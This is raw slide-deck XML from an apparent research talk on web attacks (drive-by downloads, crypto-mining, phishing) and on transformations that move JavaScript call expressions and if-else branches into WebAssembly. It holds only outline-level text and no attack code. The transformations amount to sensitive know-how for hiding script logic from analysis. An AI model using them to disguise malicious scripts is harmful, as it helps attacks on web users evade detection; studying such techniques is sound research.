            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2800" b="1" i="1" u="none" strike="noStrike" cap="none" baseline="-25000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>T4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2800" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2800" b="1" i="1" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2800" b="1" i="1" u="none" strike="noStrike" cap="none" baseline="-25000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>T4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2800" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2800" b="1" i="1" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t> p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2800" b="1" i="1" u="none" strike="noStrike" cap="none" baseline="-25000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>T4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2800" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr sz="2800" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="454" name="Google Shape;454;p44"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="671542" y="2856997"/>
            <a:ext cx="1950953" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="45700" rIns="91425" bIns="45700" anchor="t" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="11430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Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>CallExpression</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t> nodes</a:t>
            </a:r>
            <a:endParaRPr sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="455" name="Google Shape;455;p44"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5695806" y="2852564"/>
            <a:ext cx="233835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Excludes calls that have return values </a:t>
            </a:r>
            <a:endParaRPr sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="456" name="Google Shape;456;p44"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4132365" y="2407210"/>
            <a:ext cx="0" cy="1369053"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="stealth" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="457" name="Google Shape;457;p44"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="454" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2622495" y="2407063"/>
            <a:ext cx="848700" cy="773100"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="stealth" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="458" name="Google Shape;458;p44"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="455" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4750506" y="2409230"/>
            <a:ext cx="945300" cy="766500"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk1"/>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3"/>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457"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="9" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="10" presetID="1" presetClass="entr" presetSubtype="0" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="11" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="4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5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5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5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txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="182880"/>
            <a:ext cx="8520600" cy="746545"/>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Web Attacks</a:t>
            </a:r>
            <a:endParaRPr sz="3200" b="1">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="115" name="Google Shape;115;p27"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2233606" y="2666845"/>
            <a:ext cx="1097280" cy="1"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="57150" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="stealth" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="116" name="Google Shape;116;p27"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2225487" y="1628866"/>
            <a:ext cx="1105399" cy="598449"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="57150" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="stealth" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="117" name="Google Shape;117;p27"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="2267801" y="3106376"/>
            <a:ext cx="1063085" cy="568706"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="57150" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="stealth" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="118" name="Google Shape;118;p27"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1097280" y="866402"/>
            <a:ext cx="932072" cy="1125417"/>
            <a:chOff x="4881691" y="2999081"/>
            <a:chExt cx="932072" cy="1125417"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="119" name="Google Shape;119;p27"/>
            <p:cNvPicPr preferRelativeResize="0"/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId3">
              <a:alphaModFix/>
            </a:blip>
            <a:srcRect/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="4881691" y="2999081"/>
              <a:ext cx="914400" cy="1125417"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="120" name="Google Shape;120;p27"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4881963" y="3367682"/>
              <a:ext cx="9318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Drive-by</a:t>
              </a:r>
              <a:endParaRPr sz="1300" b="1" i="0" u="none" strike="noStrike" cap="none">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Download</a:t>
              </a:r>
              <a:endParaRPr sz="1300" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="121" name="Google Shape;121;p27"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1097552" y="2227315"/>
            <a:ext cx="914400" cy="1125417"/>
            <a:chOff x="4889487" y="2999081"/>
            <a:chExt cx="914400" cy="1125417"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="122" name="Google Shape;122;p27"/>
            <p:cNvPicPr preferRelativeResize="0"/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId3">
              <a:alphaModFix/>
            </a:blip>
            <a:srcRect/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="4889487" y="2999081"/>
              <a:ext cx="914400" cy="1125417"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="123" name="Google Shape;123;p27"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5002122" y="3377411"/>
              <a:ext cx="70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Crypto- </a:t>
              </a:r>
              <a:endParaRPr sz="13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mining</a:t>
              </a:r>
              <a:endParaRPr sz="1300" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="124" name="Google Shape;124;p27"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1097552" y="3600791"/>
            <a:ext cx="941048" cy="1125417"/>
            <a:chOff x="4889487" y="2999081"/>
            <a:chExt cx="941048" cy="1125417"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="125" name="Google Shape;125;p27"/>
            <p:cNvPicPr preferRelativeResize="0"/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId3">
              <a:alphaModFix/>
            </a:blip>
            <a:srcRect/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="4889487" y="2999081"/>
              <a:ext cx="914400" cy="1125417"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="126" name="Google Shape;126;p27"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4897235" y="3387138"/>
              <a:ext cx="933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FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:rPr>
                <a:t>Phishing</a:t>
              </a:r>
              <a:endParaRPr sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="127" name="Google Shape;127;p27"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3566160" y="1992224"/>
            <a:ext cx="1368181" cy="1371600"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="128" name="Google Shape;12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5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="182880"/>
            <a:ext cx="8520600" cy="738325"/>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T5-IfStatement Transformation</a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="464" name="Google Shape;464;p45"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="860399" y="1085884"/>
            <a:ext cx="8160759" cy="830997"/>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 sz="2200" b="1">
                <a:solidFill>
                  <a:srgbClr val="0C5ADB"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Intuition: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>remove control flow from JavaScript syntax</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="465" name="Google Shape;465;p45"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2278475" y="3781437"/>
            <a:ext cx="3806100" cy="882000"/>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Wrap if-else branches in anonymous functions and move them from JavaScript into WebAssembly</a:t>
            </a:r>
            <a:endParaRPr sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="466" name="Google Shape;466;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
        <p:nvSpPr>
          <p:cNvPr id="467" name="Google Shape;467;p45"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3181618" y="1839961"/>
            <a:ext cx="199981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1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2800" b="1" i="1" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>L</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2800" b="1" i="1" u="none" strike="noStrike" cap="none" baseline="-25000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>T5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2800" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2800" b="1" i="1" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2800" b="1" i="1" u="none" strike="noStrike" cap="none" baseline="-25000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>T5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2800" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2800" b="1" i="1" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t> p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2800" b="1" i="1" u="none" strike="noStrike" cap="none" baseline="-25000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>T5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2800" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr sz="2800" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="468" name="Google Shape;468;p45"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="671542" y="2856997"/>
            <a:ext cx="1950953" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="45700" rIns="91425" bIns="45700" anchor="t" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="11430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Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>IfStatement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t> nodes</a:t>
            </a:r>
            <a:endParaRPr sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="469" name="Google Shape;469;p45"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5695817" y="2825400"/>
            <a:ext cx="3136483"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Excludes if-else blocks containing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>break</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>continue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
